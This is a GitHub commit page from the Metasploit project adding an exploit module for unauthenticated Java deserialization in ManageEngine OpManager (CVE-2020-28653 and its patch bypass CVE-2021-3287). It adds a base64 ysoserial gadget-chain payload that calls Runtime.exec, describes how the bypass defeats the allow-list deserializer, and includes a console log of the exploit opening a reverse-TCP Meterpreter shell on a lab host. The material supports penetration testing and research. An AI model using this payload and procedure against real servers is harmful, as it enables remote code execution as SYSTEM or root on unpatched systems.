Skip to content

Commit fee037a

Browse files
committed
Land #15670, add opmanager sumpdu deser module
2 parents b7fd61c + 327aefd commit fee037a

7 files changed

Lines changed: 502 additions & 92 deletions

File tree

data/ysoserial_payloads.json

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -317,6 +317,17 @@
317317
},
318318
"Wicket1": {
319319
"status": "unsupported"
320+
},
321+
"frohoff/ysoserial#168": {
322+
"status": "dynamic",
323+
"lengthOffset": [
324+
553,
325+
1742
326+
],
327+
"bufferOffset": [
328+
1743
329+
],
330+
"bytes": "rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAnamF2YS51dGlsLkNvbGxlY3Rpb25zJFJldmVyc2VDb21wYXJhdG9yZASK8FNOStACAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABpTK/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAACAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAdeXNvc2VyaWFsL1B3bmVyMDAwMDAwMDAwMDAwMDABAB9MeXNvc2VyaWFsL1B3bmVyMDAwMDAwMDAwMDAwMDA7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALwAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA/AAAAAwAAAAGxAAAAAgANAAAABgABAAAANAAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAAOAAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAQAAAB1Mr+ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhxAH4ADXg="
320331
}
321332
},
322333
"bash": {
Lines changed: 116 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,116 @@
1+
## Vulnerable Application
2+
3+
### Description
4+
5+
An HTTP endpoint used by the Manage Engine OpManager Smart Update Manager component can be leveraged to deserialize an
6+
arbitrary Java object. This can be abused by an unauthenticated remote attacker to execute OS commands in the context of
7+
the OpManager application (NT AUTHORITY\SYSTEM on Windows or root on Linux). This vulnerability is also present in other
8+
products that are built on top of the OpManager application. This vulnerability affects OpManager versions 12.1 -
9+
12.5.328.
10+
11+
#### CVE-2020-28653
12+
This vulnerability affects OpManager versions 12.1 - 12.5.232. The vulnerability involves sending a malicious PDU to the
13+
SmartUpdateManager handler that when deserialized executes an arbitary OS command.
14+
15+
#### CVE-2021-3287
16+
This vulnerability is a patch bypass for CVE-2020-28653 and affects OpManager versions 12.5.233 - 12.5.328. When the
17+
original vulnerability was patched, it was done so using a new `ITOMObjectInputStream` deserializer class. This object
18+
has a flaw in its validation logic. The object works by requiring the caller to specify a list of one or more object
19+
classes that can be deserialized. If an instance is used to perform more than one `readObject` call however, only the
20+
first is protected because once a serialized object of an allowed type is read from the stream, the
21+
`ITOMObjectInputStream` instance remains in a sort of authenticated state where subsequent objects can be read of any
22+
type.
23+
24+
The exploit technique for this CVE leverages this by first sending a legitimate, serialized SUMPDU to create an instance
25+
of the `SUMServerIOAndDataAnalyzer` object whose `process` method makes multiple `readObject` calls using the same
26+
instance for each.
27+
28+
Unlike exploiting CVE-2020-28653, to exploit CVE-2021-3287 the target server must have the SUM server running. This is
29+
not the case for the standard installer, but is the case for "Central" variant. Without the SUM server running, the log
30+
handler is not initialized which causes the request handler to crash making the vulnerable code path inaccessible.
31+
32+
### Setup (Windows)
33+
34+
1. Download an affected version for either Windows or Linux from the [archive][0]
35+
1. Run the installer executable
36+
1. Accept the default values for all settings (skip registration), until the very end when prompted to start the
37+
application
38+
1. Unselect the option to start the application
39+
1. If this option is missed, just navigate to the tray icon where it will say that it's starting and select the
40+
option to stop it
41+
1. Start a command prompt as an administrative user
42+
1. Navigate to `C:\Program Files\ManageEngine\OpManager\bin`, older versions use `C:\ManageEngine\OpManager\bin`
43+
1. Run `run.bat`
44+
1. View and accept the license terms
45+
1. Press `f` to run the product in Free mode
46+
47+
OpManager should start successfully after a few minutes. At that point the service can be exploited. In this case the
48+
session will be opened in the context of the user that ran the service with `run.bat`. Once the server is restarted and
49+
OpManager starts automatically, the vulnerability can be exploited to open a session in the context of NT
50+
AUTHORITY\SYSTEM.
51+
52+
### Setup (Linux)
53+
54+
1. Download an affected version for either Windows or Linux from the [archive][0]
55+
1. Run the installer executable as root
56+
1. Accept the default values for all settings (skip registration)
57+
1. Navigate to `/opt/ManageEngine/OpManagerCentral/bin`, older versions use `/opt/ManageEngine/OpManager/bin`
58+
1. Run `run.sh` as root
59+
60+
## Verification Steps
61+
62+
1. Install the application
63+
1. Start msfconsole
64+
1. Do: `use exploit/multi/http/opmanager_sumpdu_deserialization`
65+
1. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload-related options as necessary
66+
1. Do: `run`
67+
1. You should get a shell.
68+
69+
## Options
70+
71+
### CVE
72+
Vulnerability to use. If set to 'Automatic' (the default), the module will attempt to detect the version and select the
73+
correct vulnerability.
74+
75+
## Scenarios
76+
77+
### Windows Server 2019 x64 w/ ManageEngine OpManager v12.5.328
78+
79+
```
80+
msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
81+
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
82+
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set RHOSTS 192.168.159.96
83+
RHOSTS => 192.168.159.96
84+
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set TARGET Windows\ PowerShell
85+
TARGET => Windows PowerShell
86+
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
87+
PAYLOAD => windows/x64/meterpreter/reverse_tcp
88+
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set LHOST 192.168.159.128
89+
LHOST => 192.168.159.128
90+
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > check
91+
[*] 192.168.159.96:8060 - The target appears to be vulnerable.
92+
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > exploit
93+
94+
[*] Started reverse TCP handler on 192.168.159.128:4444
95+
[*] Running automatic check ("set AutoCheck false" to disable)
96+
[+] The target appears to be vulnerable.
97+
[*] An HTTP session cookie has been issued
98+
[*] Detected version: 12.5.328
99+
[*] The request handler has been associated with the HTTP session
100+
[*] Sending stage (200262 bytes) to 192.168.159.96
101+
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.96:63887) at 2021-09-16 14:06:27 -0400
102+
103+
meterpreter > getuid
104+
Server username: MSFLAB\smcintyre
105+
meterpreter > sysinfo
106+
Computer : WIN-3MSP8K2LCGC
107+
OS : Windows 2016+ (10.0 Build 17763).
108+
Architecture : x64
109+
System Language : en_US
110+
Domain : MSFLAB
111+
Logged On Users : 9
112+
Meterpreter : x64/windows
113+
meterpreter >
114+
```
115+
116+
[0]: https://archives.manageengine.com/opmanager/

lib/msf/util/java_deserialization.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,11 +11,11 @@ class JavaDeserialization
1111

1212
def self.ysoserial_payload(payload_name, command=nil, modified_type: 'none')
1313
# Open the JSON file and parse it
14+
path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
1415
begin
15-
path = File.join(Msf::Config.data_directory, PAYLOAD_FILENAME)
1616
json = JSON.parse(File.read(path))
1717
rescue Errno::ENOENT, JSON::ParserError
18-
raise RuntimeError, "Unable to load JSON data from 'data/#{PAYLOAD_FILENAME}'"
18+
raise RuntimeError, "Unable to load JSON data from: #{path}"
1919
end
2020

2121
# Extract the specified payload type (including cmd, bash, powershell, none)

0 commit comments

Comments
 (0)